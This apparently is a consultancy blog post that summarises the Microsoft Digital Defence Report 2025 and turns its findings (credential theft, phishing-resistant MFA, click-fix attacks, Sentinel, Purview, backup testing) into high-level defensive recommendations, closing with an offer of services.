The latest Microsoft Digital Defence Report (MDDR) has once again highlighted the rapidly evolving threat landscape and the urgent need for organisations to rethink their security posture. During a recent internal business timeout meeting, our consultants walked us through the report’s findings and unpacked what they mean for organisations across Australia and beyond.
This blog summarises those insights, focusing on practical takeaways organisations can act on now.
Summary of the Microsoft Digital Defence Report 2025
1) Attackers are logging in, not breaking in.
One of the report’s core themes is a shift from traditional “break‑in” attacks toward credential‑based access. Stolen passwords, hijacked tokens, and compromised workloads are now the primary entry points. This is important because, when an attacker logs in using valid credentials, the activity can look “normal”, making detection significantly harder. How to protect your organisation:
- Implement identity protection tools that detect unusual sign‑ins.
- Use behaviour‑based analytics to catch anomalies (e.g., impossible travel, mass download activity).
- Strengthen detection with SIEM solutions such as Microsoft Sentinel.
- Consolidate logs across cloud and on‑premises systems for full visibility.
2) Why Sentinel still matters even if you’re using Microsoft Defender.
A key part of the discussion centred around whether organisations need Microsoft Sentinel if they already use Microsoft Defender. The consensus: Defender provides strong protection out of the box, but Sentinel unlocks deeper visibility, correlation, and automation, especially in hybrid or complex environments. Sentinel adds value by:
- Ingesting logs from multiple security and infrastructure sources.
- Highlighting suspicious patterns that might go unnoticed.
- Enabling custom automated responses.
- Supporting non‑Microsoft systems like firewalls or third‑party applications.
For smaller or simpler environments, Defender alone may be sufficient. But for organisations with hybrid infrastructure, industry‑specific compliance needs, or multiple security tools, Sentinel becomes a crucial SIEM/SOAR layer.
3) Phishing-resistant MFA blocks 99% of attacks.
The team shared real-world experiences underscoring just how effective phishing-resistant MFA (such as passkeys or passwordless authentication) has become. Modern phishing-resistant MFA:
- Requires biometric or device-bound authentication.
- Cannot be intercepted through traditional man-in-the-middle tactics.
- Prevents attackers from exploiting login prompts or MFA fatigue.
Moving from traditional MFA (codes, SMS, prompts) to phishing-resistant MFA dramatically reduces risk. Organisations are increasingly enabling it, especially on privileged accounts.
4) Social engineering and “click‑fix” attacks are surging.
“Click‑fix” attacks, where users are tricked into running malicious commands or scripts disguised as “fixes,” are now among the most common initial access methods. These often involve fake virus warnings, browser pop‑ups prompting action, or malicious scripts triggered by user clicks.
Organisations can combat this by strengthening user awareness training and enabling endpoint protection that blocks unauthorised scripts and suspicious behaviour.
5) Data exfiltration is the new normal.
Modern attacks increasingly focus on stealing data rather than immediately encrypting it. Microsoft Purview tools, such as Data Loss Prevention (DLP) and Insider Risk Management, were highlighted as essential for detecting unusual data movement, blocking attempted data extraction, and monitoring high-risk user behaviour.
6) Cloud and hybrid environments are prime targets.
The report emphasises that hybrid setups (a mix of cloud and on‑premises systems) have an expanded attack surface. Weak on‑premises security can serve as an entry point into the cloud through identity synchronisation or integrated services. This reinforces the need for:
- Consistent security controls across all environments.
- Consolidated monitoring.
- Enforced least‑privilege access and Zero Trust principles.
7) AI is accelerating the speed and scale of cyber-attacks.
AI is now being widely used by attackers to automate reconnaissance, craft convincing phishing campaigns, and exploit known vulnerabilities. While AI brings tremendous benefits for defenders, organisations must also:
- Strengthen detection and response capabilities.
- Continuously review AI governance and security controls.
- Evaluate tools like Microsoft Security Copilot as part of a modern defence strategy.
8) Nation-state threat activity remains high.
The report reiterates ongoing geopolitical‑driven cyber activity. Industries tied to government, critical infrastructure or national exports remain potential targets. While motivations vary, financial gain remains the dominant driver of cybercrime globally.
9) Organisations must assume breach and test their readiness.
One of the most practical insights discussed was the need for regular backup testing and recovery rehearsals. The team reflected that while many organisations have backup solutions in place, few actively test restoration processes. Our cybersecurity consultants recommended these actions:
- Conduct scheduled test restores several times a year.
- Document outcomes and improve procedures.
- Include disaster recovery and ransomware simulations.
- Build this into managed service contracts where applicable.
Microsoft’s Top Security Recommendations for 2026
The Microsoft Digital Defence Report outlined several strategic priorities for organisations:
- Treat cybersecurity as a business‑level risk. Use measurable KPIs such as patching speed, MFA coverage, detection response times, and data classification completeness.
- Enforce phishing‑resistant MFA everywhere, especially for admins and executives.
- Adopt Zero Trust as the security foundation. This identity‑driven approach enforces least‑privilege access and reduces risk by assuming no user or device is inherently trusted.
- Strengthen data protection with Purview. Implement DLP, sensitivity labels and insider‑risk monitoring.
- Leverage AI‑powered defence. Use tools that enhance detection, automate correlation, and accelerate incident response.
- Improve AI governance. Establish clear policies around AI usage, model security, and data boundaries.
- Begin long‑term planning for post‑quantum cryptography. While still emerging, the shift will fundamentally change encryption standards.
Conclusion
The Microsoft Digital Defence Report makes one thing clear: Security is no longer just about tools. It’s about strategy, integration, and constant readiness. From strengthening identity protection to testing backups, improving visibility and adopting phishing‑resistant MFA, there are clear steps organisations can take today to improve their security posture.
If you would like help implementing any of the best practices discussed or want support evaluating your current security landscape, please reach out. This is the perfect time to strengthen your defences for 2026 and beyond.
